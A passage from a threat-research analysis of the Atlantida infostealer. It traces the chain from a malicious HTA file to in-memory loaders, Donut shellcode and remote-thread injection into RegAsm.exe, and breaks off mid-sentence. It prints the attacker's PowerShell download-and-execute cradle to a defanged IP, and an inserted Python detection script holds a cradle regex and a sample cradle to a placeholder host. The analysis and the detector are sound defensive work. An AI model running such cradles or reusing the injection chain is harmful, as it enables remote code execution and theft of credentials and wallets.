Whispers of Atlantida: Safeguarding Your Digital Treasure


Recently, Rapid7 observed a new stealer named Atlantida. The stealer tricks users into downloading a malicious file from a compromised website, and uses several evasion techniques, such as reflective loading and injection, before the stealer itself is loaded.

Atlantida steals a wide range of login information from software such as Telegram and Steam, data from several offline cryptocurrency wallets, browser-stored data, and data from cryptocurrency wallet browser extensions. It also captures the victim's screen and collects hardware data.

Technical Analysis

Stage 1 - Delivery

The attack starts with a user downloading a malicious .hta file from a compromised website. It is worth mentioning that the .hta file is manually executed by the victim. When investigating the file, we observed a Visual Basic Script that decrypts a hardcoded base64 string and executes the decrypted content:

The decrypted command is: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" irm hxxp://166.1.160[.]10/loader.txt | iex

Stage 2 - Three levels of in-memory loading

The executed PowerShell command downloads and executes a next stage PowerShell script in memory.

The PowerShell script downloads and reflectively loads a .NET downloader. The .NET downloader is simple: it calls the DownloadData API function to fetch a Donut injector. Donut is position-independent shellcode that enables in-memory execution of VBScript, JScript, EXE and DLL files and .NET assemblies. Next, the Donut shellcode is injected into a newly created "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" process using the Remote Thread Injection technique (aka CreateRemoteThread). This technique works by writing shellcode into the memory of another eligible process and creating a thread in that process to run the payload.
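As an added defender-side illustration (not Rapid7's code or tooling), the following Python checks constructed Sysmon-style process-creation (event 1) and CreateRemoteThread (event 8) records for the delivery chain described above: HTA-launched PowerShell, an irm | iex download cradle, and RegAsm.exe being spawned and injected from PowerShell. The event field names, file paths and the placeholder URL are assumptions, not real telemetry.

```python
import re

# Constructed Sysmon-style events (not real telemetry) modelling the chain:
# browser -> mshta.exe (HTA) -> powershell.exe (cradle) -> RegAsm.exe (remote thread).
SAMPLE_EVENTS = [
    {"id": 1, "image": r"C:\Windows\System32\mshta.exe",
     "parent": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "cmdline": r'"C:\Windows\System32\mshta.exe" "C:\Users\user\Downloads\setup.hta"'},
    {"id": 1, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" '
                r'irm hxxp://placeholder-c2[.]invalid/loader.txt | iex'},
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r'"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"'},
    {"id": 8, "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "target_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"},
    # Benign noise: a developer registering an assembly from a command prompt.
    {"id": 1, "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe",
     "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"RegAsm.exe MyLib.dll /codebase"},
]

# A download cradle: a web fetch cmdlet/method followed by Invoke-Expression.
CRADLE_RE = re.compile(
    r"\b(irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloaddata)\b"
    r".*\b(iex|invoke-expression)\b", re.I)

def basename(path):
    """Lower-cased file name of a Windows path."""
    return path.rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, event_index) hits for the Atlantida-style delivery chain."""
    hits = []
    for i, ev in enumerate(events):
        if ev["id"] == 1:  # process creation
            img, parent = basename(ev["image"]), basename(ev["parent"])
            if img == "powershell.exe" and parent == "mshta.exe":
                hits.append(("hta_spawns_powershell", i))
            if img == "powershell.exe" and CRADLE_RE.search(ev["cmdline"]):
                hits.append(("powershell_download_cradle", i))
            if img == "regasm.exe" and parent == "powershell.exe":
                hits.append(("regasm_spawned_by_powershell", i))
        elif ev["id"] == 8:  # CreateRemoteThread into another process
            if (basename(ev["target_image"]) == "regasm.exe"
                    and basename(ev["source_image"]) != "regasm.exe"):
                hits.append(("remote_thread_into_regasm", i))
    return hits
```

Each rule alone is noisy on a developer workstation; the value is in the same parent/child chain firing all four in sequence.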

Figure 4 - .Net downloader Main function

Stage 3 - Atlantida Stealer

The Donut injector is used to ..
